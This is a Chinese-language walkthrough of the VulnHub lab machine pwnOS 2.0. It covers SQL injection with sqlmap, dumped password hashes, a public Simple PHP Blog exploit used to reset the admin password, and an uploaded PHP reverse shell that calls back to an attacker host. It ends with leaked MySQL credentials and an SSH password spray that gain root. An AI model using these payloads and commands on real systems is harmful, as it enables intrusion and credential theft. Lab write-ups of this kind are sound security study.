这台靶机要自行配置攻击机在10.10.10.0/24网段下
sql注入
80端口login处发现可以注入的地方,sqlmap能梭出来很多东西,但是好像都登录不了,--os-shell也是没回显的
sqlmap -u http://10.10.10.100/login.php --data="email=1&pass=1&submit=Login&submitted=TRUE" -D ch16 -T users --dump -C email
+------------------+
| email |
+------------------+
| admin@admin.com |
| admin@isints.com |
+------------------++------------------------------------------+
| pass |
+------------------------------------------+
| a6f6077d3947da34b11414ffeb86d8828ef9b005 |
| c2c4b4e51d9e23c02c15702c136c3e950ba9a4af |
+------------------------------------------+
123abc_
killerbeesareflying
目录扫描
dirb中扫描出来有搭建bolg服务
dirb http://10.10.10.100
进入index界面,使用之前爆出来的好像也是登录失败
查看源码发现是Simple PHP Blog 0.4.0
,这一步还真得认真找找才能看到,只能说指纹识别这种还是多看看文件头或者源码时候全局搜索下by
字眼吧。
漏洞利用
searchsploit Simple PHP Blog 0.4.0
拿版本号完全一致的1191.pl来用,后面的哪个metasploit也行
searchsploit -m 1191.pl
要安装一下perl的环境依赖,不然跑不起来
sudo apt install libswitch-perl
直接先试试dump一下他的密码,拿到的是和目录爆破出来中的config目录中泄露的一样的东西
perl 1191.pl -h http://10.10.10.100/blog -e 2
那就直接修改密码
perl 1191.pl -h http://10.10.10.100/blog -e 3 -U ha -P ha
进入博客后台
发现存在图片上传的点,并且没有文件类型校验。
直接写上反弹马
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.128/1234 0>&1'"); ?>
触发的路径在之前dirb中可以发现到image的目录,点击即可触发
本地1234端口开启监听,成功getshell
nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.100] 32903
bash: no job control in this shell
www-data@web:/var/www/blog/images$ ls
ls
back.php
建立一个交互性更好的shell
python -c "import pty;pty.spawn('/bin/bash')"
提权
sudo -l
发现需要密码,只能到处找点信息了
cat /etc/passwd |grep "/bin/bash"
发现存在root、mysql、dan三个用户
说起mysql,那就得去看看php网页目录下各种文件有没有连接数据库的密码了
在/var/www
找到了一个,但是使用了goodday后发现是错误的密码
www-data@web:/var/www$ cat mysqli_connect.php
cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.// Set the database access information as constants:DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');// Make the connection:$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );
?>
但是在/var
下又找到了另外一个
www-data@web:/var/www$ cat /var/mysqli_connect.php
cat /var/mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.// Set the database access information as constants:DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');// Make the connection:$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );
?>
登录是成功登录了,但是发现搜到的东西和之前sqlmap一样,然后在想着怎么拿mysql的root用户干点什么事情。
[猥琐姿势]利用MySQL的root账号从而快速GetShell - 知乎 (zhihu.com)
https://blog.51cto.com/297020555/544763#
试了上面两篇都不行,感觉是因为默认情况下mysql服务仅localhost可访问导致的
那就开始碰运气了
拿目前已知的信息做两个表
┌──(root㉿kali)-[~/Desktop/vulnHub/pwnos2]
└─# cat user
root
admin
isints
dan┌──(root㉿kali)-[~/Desktop/vulnHub/pwnos2]
└─# cat pass
isints
123abc_
killerbeesareflying
root@ISIntS
goodday
使用工具爆破尝试
┌──(root㉿kali)-[~/Desktop/vulnHub/pwnos]
└─# crackmapexec ssh 10.10.10.100 -u user -p pass --continue-on-success | grep "+"
SSH 10.10.10.100 22 10.10.10.100 [+] root:root@ISIntS (Pwn3d!)
ssh连接
┌──(root㉿kali)-[~/Desktop/vulnHub/pwnos]
└─# ssh root@10.10.10.100
root@10.10.10.100's password:
Permission denied, please try again.
root@10.10.10.100's password:
Welcome to Ubuntu 11.04 (GNU/Linux 2.6.38-8-server x86_64)* Documentation: http://www.ubuntu.com/server/docSystem information as of Wed Jul 17 12:30:47 EDT 2024System load: 0.0 Processes: 82Usage of /: 2.9% of 38.64GB Users logged in: 0Memory usage: 23% IP address for eth0: 10.10.10.100Swap usage: 0%Graph this data and manage this system at https://landscape.canonical.com/
Last login: Mon May 9 19:29:03 2011
root@web:~# ls
root@web:~# sudo -l
Matching Defaults entries for root on this host:env_resetUser root may run the following commands on this host:(ALL : ALL) ALL
提权成功